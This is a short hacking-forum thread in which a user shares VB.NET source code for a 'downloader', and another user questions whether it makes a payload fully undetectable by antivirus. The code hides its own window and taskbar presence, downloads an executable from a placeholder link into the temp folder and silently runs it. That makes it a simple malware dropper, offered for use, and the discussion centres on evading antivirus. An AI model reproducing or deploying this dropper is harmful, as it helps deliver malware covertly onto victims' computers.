Login Register






Downloader [Source Code] filter_list
Author
Message
Downloader [Source Code] #1
Enjoy.  Sarcasm

Code:
Skype: demCLood Me.Hide() Me.ShowInTaskbar = False Me.ShowIcon = False Dim funkynoise As New System.Net.WebClient funkynoise.DownloadFile("exe direct link", Microsoft.VisualBasic.Interaction.Environ("tmp") + "/Downloader.exe") Process.Start(Microsoft.VisualBasic.Interaction.Environ("tmp") + "/Downloader.exe") End

Pastebin
Ghostbin
(This post was last modified: 01-29-2017, 09:25 PM by CLood.)
Most people think that WLAN was made by very intelligent humans. Well this is not wrong, but they were only humans. And so they created the ARP without any sense of security.
Skype: demCLood

Reply

RE: Downloader [Source Code] #2
Just one question. Your code clearly downloads a file, moves it to the tmp directory and executes this. Why do you think that this will make a file FUD?

Most AV's are real-time scanners, that will scan the file before being opened. Avast even has something they call "Deepscan" this will scan any applications from an unidentified source before opening it. It will run a few seconds in a sandbox while it's being analyzed. Even Windows Defender handles this.

Not meant offensive in any way, but this will not make your file FUD, that's all I'm saying. Thanks for the share nontheless.
~~ Might be back? ~~

Reply

RE: Downloader [Source Code] #3
(01-30-2017, 08:45 PM)Bish0pQ Wrote: Just one question. Your code clearly downloads a file, moves it to the tmp directory and executes this. Why do you think that this will make a file FUD?

Most AV's are real-time scanners, that will scan the file before being opened. Avast even has something they call "Deepscan" this will scan any applications from an unidentified source before opening it. It will run a few seconds in a sandbox while it's being analyzed. Even Windows Defender handles this.

Not meant offensive in any way, but this will not make your file FUD, that's all I'm saying. Thanks for the share nontheless.

Just re-shared it bro,
Most people think that WLAN was made by very intelligent humans. Well this is not wrong, but they were only humans. And so they created the ARP without any sense of security.
Skype: demCLood

Reply